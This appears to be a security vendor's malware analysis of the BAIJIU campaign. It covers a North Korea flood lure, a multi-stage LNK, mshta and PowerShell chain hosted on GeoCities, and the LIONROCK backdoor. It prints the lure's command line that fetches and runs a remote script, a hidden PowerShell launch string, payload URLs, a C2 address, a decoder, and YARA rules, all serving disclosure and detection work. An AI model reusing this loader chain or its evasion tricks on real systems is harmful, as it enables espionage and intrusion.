Attack Analysis - Background and Lure
With international attention focused on the tinderbox of the Korean peninsula, Cylance is shedding new light on a threat we call BAIJIU, one that preys upon heightened interest in what is going on inside the borders of the hermit kingdom of North Korea.
BAIJIU, which evades widespread detection, abuses global concern about the dire humanitarian situation in North Korea. It enters the target environment through an LNK file on the end of a phishing hook with the following bait:
“2016 North Korea Hamgyung [sic] province flood insight.”
The lure is a reference to a natural disaster that took place in late August 2016, when Typhoon Lionrock triggered massive flooding that devastated much of North Korea’s province of North Hamgyong, affecting more than half a million people, drawing worldwide notice, and commanding international news coverage for several months.
Despite the media attention, details were sparse regarding the extent and aftermath of the crisis. Reports surfaced of attempts at escape and defection to neighboring China, after border forces and fencing were washed away.
Drawing even more curiosity were statements from Pyongyang itself, which took the rare step of publicly declaring the flood the worst natural disaster since 1945. The dictatorship appealed to the UN and aid groups for help with relief efforts, and asked the international community for monetary support.
How the crisis was resolved, and what its lasting impact on North Korea was, is anyone’s guess. Exactly how many people died or were displaced? Were North Korea’s official pronouncements to be believed? BAIJIU’s attackers bet that many of their phishing targets would click on the attachment to find out; in other words, that they would take the bait.
Attack Analysis - Provenance and C2
BAIJIU’s goal in this attack was to deploy a set of espionage tools through a downloader we call TYPHOON and a set of backdoors we call LIONROCK.
Three distinctive elements of BAIJIU drew and held our attention: the unusual complexity of the attack; the appropriation of web hosting service GeoCities (of 1990s fame); and the use of multiple methods of obfuscation. These features have, as far as we can see, helped BAIJIU evade nearly every antivirus (AV) solution.
Cylance believes TYPHOON/LIONROCK’s provenance is likely Chinese, and that it probably evolved from the Egobot codebase first described by Symantec, which was subsequently connected to the larger Dark Hotel operation written up by Kaspersky.
The tip of the spear – the LNK file itself – was a shortcut to execute the following command:
C:\Windows\System32\cmd.exe /C start "" mshta "about:<script>map1='hxxps://support.google(dot)com/maps/answer/3093609?co=GENIE.Platform_Desktop';map2='hxxps://support.google(dot)com/maps/answer/437584?co=GENIE.Platform_Desktop';map3='hxxps://support.google(dot)com/maps/answer/125748?co=GENIE.Platform_Desktop';</script><script>window.moveTo(99999,99999)</script><script language='javascript' src='hxxp://www.geocities(dot)jp/zboard01/001/1.tmp'></script><script>window.close()</script>""
The “about:” URI hands mshta an inline HTML document to render. Of its four script blocks, the first only assigns three Google Maps support URLs to variables (nothing in this command line ever loads them), the second moves the window far off-screen so that nothing is visible to the user, the third fetches and executes a remote script, and the last closes the window. The JavaScript of interest is therefore downloaded and executed from “hxxp://www.geocities(dot)jp/zboard01/001/1.tmp”.
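A small triage helper makes that chain explicit. The following is an added Python example, written for this edit rather than taken from the post or from Cylance’s tooling; it takes the LNK command line above (copied here in its defanged form, as constructed sample input), isolates the inline HTML passed to mshta, and reports which script blocks load remote code, which URLs appear only in inline assignments, and whether the window is parked off-screen. Nothing in it is specific to BAIJIU, so the same function can be run over the command-line field of process-creation or Sysmon events.

```python
import re
from urllib.parse import urlparse

# Constructed copy of the LNK command line quoted above, kept defanged exactly as on the page.
LNK_CMDLINE = r'''C:\Windows\System32\cmd.exe /C start "" mshta "about:<script>map1='hxxps://support.google(dot)com/maps/answer/3093609?co=GENIE.Platform_Desktop';map2='hxxps://support.google(dot)com/maps/answer/437584?co=GENIE.Platform_Desktop';map3='hxxps://support.google(dot)com/maps/answer/125748?co=GENIE.Platform_Desktop';</script><script>window.moveTo(99999,99999)</script><script language='javascript' src='hxxp://www.geocities(dot)jp/zboard01/001/1.tmp'></script><script>window.close()</script>""'''

SCRIPT_RE = re.compile(r'<script\b([^>]*)>(.*?)</script>', re.I | re.S)
SRC_RE = re.compile(r'''src\s*=\s*['"]([^'"]+)['"]''', re.I)
URL_RE = re.compile(r'''['"](hxxps?://[^'"]+)['"]''', re.I)
OFFSCREEN_RE = re.compile(r'window\.moveTo\(\s*-?\d{4,}')  # window moved far outside any display


def refang(url):
    """Undo the defanging used on this page: hxxp -> http, (dot)/[dot] -> '.'."""
    url = re.sub(r'^hxxp', 'http', url, flags=re.I)
    return re.sub(r'[\(\[]dot[\)\]]', '.', url, flags=re.I)


def triage_mshta_cmdline(cmdline):
    """Return None if this is not an mshta about: launch, else a summary of what it does."""
    m = re.search(r'mshta\s+"?(about:.*)$', cmdline, re.I | re.S)
    if not m:
        return None
    html = m.group(1)
    remote, inline_urls, hides_window = [], [], False
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:                                   # <script src=...>: code fetched and executed
            remote.append(refang(src.group(1)))
        inline_urls.extend(refang(u) for u in URL_RE.findall(body))  # URLs merely mentioned
        if OFFSCREEN_RE.search(body):
            hides_window = True
    return {
        "remote_scripts": remote,
        "remote_hosts": sorted({urlparse(u).hostname for u in remote}),
        "inline_urls": inline_urls,
        "hides_window": hides_window,
        # remote code plus a hidden window is the shape of this lure's first stage
        "suspicious": bool(remote) and hides_window,
    }
```

Run over the command line above, the helper reports a single remote script (1.tmp on www.geocities.jp), three inline Google support URLs that are never fetched, and an off-screen window; the decoy URLs are the kind of detail that makes a one-line “contains google.com” allow-list dangerous.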
GeoCities Japan, now owned by Yahoo, is a free web hosting service that anyone with a Yahoo email address can use, and it requires nothing more of its users than that address. These features make it attractive to ordinary users, but they have also drawn those who see value in appropriating the service for illicit ends.
We realize GeoCities may seem like a total blast from the past, but Cylance is not alone in noticing its second act revival and its apparent popularity as a launching pad for malware.
A security researcher known as “unixfreaxjp”, who founded the non-profit security research group malwaremustdie.org, found in March 2017 that GeoCities had been leveraged in separate targeted attacks to deliver Poison Ivy payloads. Poison Ivy has long been associated with Chinese APT groups.
Over the course of our investigation, Cylance saw that GeoCities was being heavily leveraged across multiple campaigns. We identified ten active sites hosted on the service that were used to deliver similar malicious payloads (see the end of this blog for full details).
Attack Analysis - Malware
Our analysis of “hxxp://www.geocities(dot)jp/zboard01/001/1.tmp” shows that the first six lines of “1.tmp” set up encoded variables:
These lines were immediately of interest, and tracing their use in the code led to a function called “EXR,” which was used to decode the variables.
We re-implemented EXR in Python for easy reuse (indentation restored, bit tests parenthesized because in Python “!=” binds tighter than “&”, and comments added):
def EXR(p):
    # Rebuilds each byte by swapping bit 6 with bit 5 and bit 4 with bit 1;
    # bits 3, 2 and 0 pass through unchanged and bit 7 is dropped.
    # c starts at 0, so the "else" branches (c & mask) are no-ops kept only
    # to mirror the JavaScript. For 7-bit input the function is its own inverse.
    s = ''
    for x in p:
        c = 0
        if (ord(x) & 64) != 0:
            c = c | 0x20
        else:
            c = c & 0xDF
        if (ord(x) & 32) != 0:
            c = c | 0x40
        else:
            c = c & 0xBF
        if (ord(x) & 16) != 0:
            c = c | 0x02
        else:
            c = c & 0xFD
        if (ord(x) & 8) != 0:
            c = c | 0x08
        else:
            c = c & 0xF7
        if (ord(x) & 4) != 0:
            c = c | 0x04
        else:
            c = c & 0xFB
        if (ord(x) & 2) != 0:
            c = c | 0x10
        else:
            c = c & 0xEF
        if (ord(x) & 1) != 0:
            c = c | 0x01
        else:
            c = c & 0xFE
        s += chr(c)
    return s
Figure 2: Python Snippet to Decode Variables
“pa0” was never referenced anywhere else in the code; the rest of the variables from Figure 1 decoded to the following:
The two files, “nomz32.tmp” and “nomz64.tmp”, hosted on GeoCities Japan, were a 32-bit and a 64-bit DLL, respectively, with the “MZ” header removed. Stripping the header appears to have reduced detection rates substantially: neither file was flagged by traditional or NextGen AV.
That was almost surely a deliberate attempt to evade common network intrusion signatures, which key on an executable download. But it may also have been necessary simply to get the files onto GeoCities in the first place.
Either way, the 1.tmp JavaScript contained a function that wrote the header back after the respective file had been downloaded to disk. The hashes below list each hosted .tmp next to the DLL name it was written under:
nomz32.tmp – 8b1688d3779f408262d0eca9f486f9039e3607a07e20df52181b4ba585c1939a
regsv32.dll – 30a3503394d5de2912eb27fcf0ae24fcbfa7d27a4a49a1e6ce7271db211ab207
nomz64.tmp – d352cdf812645e6f2d890da871ee3ae95c0be7a2520af49132f2b50080fbd67a
regsv64.dll – 9ad91bd5860bd87e9823ee19c52515327c9230b4444fb91ad38821394b1b055a
Both DLLs conveniently used the same string-encoding algorithm as the JavaScript, which sped up analysis considerably. Each functioned as an elaborate launcher for a PowerShell script embedded in its resource section.
Rather than calling FindResource or FindResourceEx, the DLLs mapped their own image with CreateFileMappingW and MapViewOfFile and scanned the mapping for the string “<<<:resource”. Avoiding the resource APIs means the script never shows up as a resource that a resource viewer, or a sandbox hooking those APIs, would enumerate; the marker itself is static, though, and it is what the Typhoon_Downloader YARA rule below keys on.
Once the marker was found, the PowerShell script following it was decoded by XORing every byte with 0x1F. A single-byte XOR is trivial; the unusual placement was likely an attempt to evade established detection methods for this type of obfuscation.
The script was then invoked with the command “powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -noprofile Invoke-Command -scriptblock {%s}”, where %s was the contents of the decoded script. Both DLLs also employed a number of tricks to defeat automated emulation and analysis, as well as simple tricks to hinder debugging.
Both files were also signed using an expired digital certificate belonging to “www.mywellnessmatters.com”. A signature made with a certificate that expired years earlier does not validate on Windows unless it carries a trusted timestamp countersignature, so this buys no trust from the operating system; its likely purpose is to make the files look legitimate on casual inspection.
Certificate Details:
Name: www.mywellnessmatters.com
Valid: Feb 19, 2007 to Feb 22, 2010
Serial Number: 20 18 98 C3 00 00 00 00 74 E0
The PowerShell script encoded within the resource section used some rudimentary methods to obfuscate variable and function names by rendering them to arbitrary combinations of the characters “\/_=”.
However, it conveniently employed the same string-encoding algorithm as the JavaScript:
Further analysis of the script showed it was a rather elegant launcher that would routinely query the sites listed above and sleep if nothing was available.
Cylance succeeded in downloading “hxxp://www.geocities(dot)jp/toedu01/informa(dot)txt”, a secondary PowerShell script. This PowerShell script was responsible for delivering and executing the final payloads. Fortunately for us, it also utilized the same method of string encoding:
The script would download the respective 32-bit (scnpst32.tmp and contab32.tmp) or 64-bit (scnpst64.tmp and contab64.tmp) payloads and, once they were on disk, write the “MZ” header back into each file.
The scnpstXX.tmp DLLs functioned as loaders for their respective 32-bit or 64-bit contabXX.tmp files. Both scnpstXX.tmp files were additionally signed with an unusual expired certificate issued to an Icelandic hostname:
Certificate Details:
Name: secure.hotelcentrum.is
Valid: Feb 27, 2005 to March 30, 2007
Serial Number: 03 36
Although the name aligns with a popular Icelandic hotel, Hotel Reykjavík Centrum, the certificate does not seem to belong to the hotel itself.
These files also used a slightly different encoding mechanism, several byte shifts plus a single-byte XOR, for a handful of strings that would likely have triggered AV heuristics if left in the clear.
The contabXX.tmp DLLs were full-featured backdoors that provided the attacker the ability to enumerate and manipulate files, enumerate drive and volume information, manipulate processes, enumerate and manipulate registry information, upload/download files, capture screenshots, and securely remove traces of the backdoor.
The DLLs would accept the following commands:
• activeport
• ddel
• ddir
• diskinfo
• exit
• find
• httpget
• packetsize
• prockill
• proclist
• procspawn
• recent
• regkeydel
• reglist
• reglistall
• regvaldel
• rereg
• screenauto
• screenupload
• sdir
• strings
• system
• timeout
• upload
• wipe
Both samples communicated back to the IP address 103.8.27.135; analysis of the network protocol itself is ongoing.
Cylance was unable to find additional lures. However, as mentioned above, numerous similar payloads and scripts were identified across GeoCities Japan websites.
TYPHOON Payloads:
hxxp://www.geocities[dot]jp/akikoakagi1013/nomz32.tmp
hxxp://www.geocities[dot]jp/akikoakagi1013/nomz64.tmp
hxxp://www.geocities[dot]jp/lboard_01/nomz32.tmp
hxxp://www.geocities[dot]jp/lboard_01/nomz64.tmp
LIONROCK Payloads:
hxxp://www.geocities[dot]jp/coloseaer_0812/contab32.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/contab64.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/scnpst32.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/scnpst64.tmp
hxxp://www.geocities[dot]jp/jjboard_01/contab32.tmp
hxxp://www.geocities[dot]jp/jjboard_01/contab64.tmp
hxxp://www.geocities[dot]jp/jjboard_01/scnpst32.tmp
hxxp://www.geocities[dot]jp/jjboard_01/scnpst64.tmp
PowerShell Scripts:
hxxp://www.geocities[dot]jp/hanakofukumoto/colinsta.txt
hxxp://www.geocities[dot]jp/junkohagiwara3/readmesub.txt
hxxp://www.geocities[dot]jp/murimakiyami/ps001/update_m.tmp
hxxp://www.geocities[dot]jp/murimakiyami/ps001/update_s.tmp
hxxp://www.geocities[dot]jp/pboard01/informab.txt
hxxp://www.geocities[dot]jp/toedu01/informa.txt
Conclusions:
BAIJIU’s circuitous route from LNK file to LIONROCK backdoor through multiple DLL files and PowerShell scripts – and its ability to obfuscate itself through each stage while doing so – makes this attack stand out.
BAIJIU’s operators likely employed this strategy to throw researchers and investigators off their track and to ensure that only the intended victims received the payloads. Automated sandboxes would presumably also fail to reach the final payloads: the PowerShell scripts contain numerous sleep loops, and the DLL downloader contains anti-emulation tricks.
Appropriating GeoCities’ free, high-bandwidth, civilian infrastructure also helps BAIJIU hide in plain sight, and signals a troubling new trend in attack techniques that is almost surely not restricted to Yahoo’s GeoCities.
While Cylance maintains that an explication of new attack methods is more valuable to end-users than speculative attempts at attribution, the skill level employed by BAIJIU suggests a worthy adversarial threat.
Whoever BAIJIU’s authors are or what their intent may be, one thing is clear: the TYPHOON/LIONROCK attack chain has evaded nearly every legacy AV and NextGen AV solution on the market today. Cylance is the exception.
TYPHOON Samples:
16486b17c635038d0ff0a035d5c0c89bbd62ca6d85b4161060c5bd05de69924e
2cc0dbe268f4184b167aff4089feaa8a3ee91eac6a25112c9498558e8bab193c
30a3503394d5de2912eb27fcf0ae24fcbfa7d27a4a49a1e6ce7271db211ab207
3d7fce51cbab9847bd4ab95ccd9db7cc6c096add99b6285639be5231ff6013c6
422addad546c4418173751567d18a05b080285910c9199b544d6f08f15838a22
4a3dba1be5634477b99b9940a7adebdf81c2746172aad5fd08e2366e19bb7a7f
6b0042fa0a599f0e4530806474f765f2896eeca69d9489eabb4ff9aac284acd8
9ad91bd5860bd87e9823ee19c52515327c9230b4444fb91ad38821394b1b055a
LIONROCK Samples:
22092aefddda66776c344ee5a239ea988ed70a20176ce7977aff7debde61253b
26108999e34af20b4f730e0a937435e2da108b6014a8f6c3b5d2c213499b0476
4fa44236abd43d0da4a46765eb1da5d070a06d0b2fc16e728dda729f31d9e55d
62f4c97791109991904173c6d8ef6ffcd834a6944dff2395421fd504ebb6a631
6b0c3e4980355687fc39e86e18dff9ddb323d2048a20eb2f253d884881b41f6c
8608081e5d76b0eacfefa2c57de683655cb70fcfe22b222dbc6afeb7b8102226
bdd24214a52f995a51e41f5061d2dfb02159abfd157de205c9359d5a9cab06a2
c561fd9cc5e6eb10f17935eee88b841e125b1a08a6d500243ea5084629904183
c72121a61ca608e57ccb8a17e6d2c8e621f5c51e9b701bdf38a4a673dcf3b077
def1c8c557b33294e1334479a6a1840be21b1fcfe82ecd120e4a296fba78107b
JavaScript Payload:
63499f7445158553c7b15484ccd18e4147dc7dc8205e6b62abc5f52071b1df9f
YARA Rules:
rule Lionrock_Powershell
{
    strings:
        $http = "hffbZ]]"
        $geo = "www\\ue}qifies\\xb]"
    condition:
        $http or $geo
}

rule Typhoon_Downloader
{
    strings:
        $ps = "<<<:resource"
        $exp = "start_adobeup"
        $e = "W78D432S34A9"
        $f = "!SJ1B0RSWRKK"
        $b = "wyy}EBB"
        $geo = "hhhCjzbnvyvzlCg}B"
    condition:
        $ps or $exp or ($e and $f) or $b or $geo
}

rule Lionrock_Loader
{
    strings:
        $a = "sfarfdk|amiqd|s"
        $b = "s1-s{wlsz,s"
        $c = "q}llyer|eldll"
    condition:
        ($a and $b) or $c
}

rule Lionrock_Backdoor
{
    strings:
        $a = "windows\\currentversion\\run;reglist"
        $power = "b}wershell\\eje@M|}br}tile@)|v}yeM1}mma|d@Msqribfpl}qy{DbafhOUEsU[DdafaO5efM1}|fe|f@Dbafh[t}reaqhHDqmd@i|@DdafaI{iej@Dqmd[oo"
        $b = "agf}ejeqdir"
        $c = "sfarfdk|amiqd|s"
    condition:
        $power or $b or ($a and $c)
}